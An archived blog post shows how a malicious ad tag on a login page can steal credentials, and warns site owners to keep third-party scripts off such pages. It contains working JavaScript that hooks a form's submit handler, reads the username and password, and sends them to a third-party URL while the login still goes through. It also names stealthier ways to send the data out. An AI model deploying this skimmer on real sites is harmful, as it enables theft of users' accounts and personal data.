Notice: This blog is no longer updated. You may find a broken link or two

You can follow my new adventures @mikeonwine


I spent the last hour trying to prove an idea I’ve had for a while. Say you wanted to steal users’ login credentials for various social networking sites, get at their personal info and do who knows what with it. It turns out to be very easy if you can get an ad (either a third-party tag or a Flash creative) onto the login page of your victim site, and that shouldn’t be too difficult, since so many sites put a login form on practically every page.

Ok, how do you do it? Let’s pretend you have a web page with the following form on it:

<form method="post" action="do_login.php" id="passform">
<b>User:</b><input type="text" name="username" /><br>
<b>Pass:</b><input type="password" name="mypass" /><br>
<input id="submitbutton" type="submit" value="Submit password"/>
</form>

This is one of the most basic HTML forms there is: it takes a username and password and submits them to a login page. Normally you fill it in, click submit and end up logged into the website. Now imagine that we show an ad on this page, and that the sketchy player above decides to use that ad to steal your credentials. It is remarkably easy. Say we have the following ad tag on the page:

<script type="text/javascript" src="http://www.tenantnetwork.com/badad.js"></script>

This is a very standard way of serving ads; you’ll see it pretty much throughout the web. The important point is that a third-party tag like this runs JavaScript with exactly the same privileges as the site’s own scripts, so it can read and modify anything on the page. There is more than one way to get that JavaScript running, too: you can serve a third-party script tag directly, or a Flash ad can call out to JavaScript (through ExternalInterface, for example). So, how do we steal your info? Super easy… here’s the JavaScript to do it :)

 // Grab the login form by its id and keep whatever onsubmit handler the site installed.
 var theForm = document.forms['passform'];
 var oldsubmit = theForm.onsubmit;
 theForm.onsubmit = function () {
    // childNodes indexes count the whitespace text nodes between the tags,
    // so [2] is the username input and [6] is the password input in the form above.
    var user = theForm.childNodes[2].value;
    var pass = theForm.childNodes[6].value;
    // Ship the credentials to the third party in a popup; encode them so a
    // '&' or '#' in the password does not get cut off in the query string.
    window.open('http://www.tenantnetwork.com/steal_pass.php?pass=' + encodeURIComponent(pass) +
                '&user=' + encodeURIComponent(user),
                "mywindow", "menubar=0,resizable=0,width=350,height=150");
    // Run the site's own handler (if there was one) and return its result so the login still works.
    return oldsubmit ? oldsubmit.call(theForm) : true;
 };

 // Render the actual ad so the page looks normal.
 document.write('<img src="http://www.tenantnetwork.com/samplead.gif"/>');

So what does this code do? We store a copy of the form’s original submit handler in “oldsubmit”, replace the handler with our own, grab the username and password you’ve typed in and send them to a third-party website, then hand control back to the original handler so the login goes through as if nothing happened. I happened to choose my failed real estate site; it was the only third party I could get access to =). Not bad, right? Note that I transmitted the info using a popup window, but I’m sure the smarter guys out there could think of a hundred different ways of doing this (an image request or a hidden iframe would do it without the user seeing anything at all).

Own a website that people log in to? Any third-party script on that page runs with the same access to the DOM as your own code, so I would highly recommend removing any and all untrusted third-party content from pages that carry login forms or other sensitive information.

I’ve put together a very simple working example here. The page shows a login form with a third-party ad. Try entering a random username and password, and you should see a popup from the “third party” that served the ad with a nice little message =).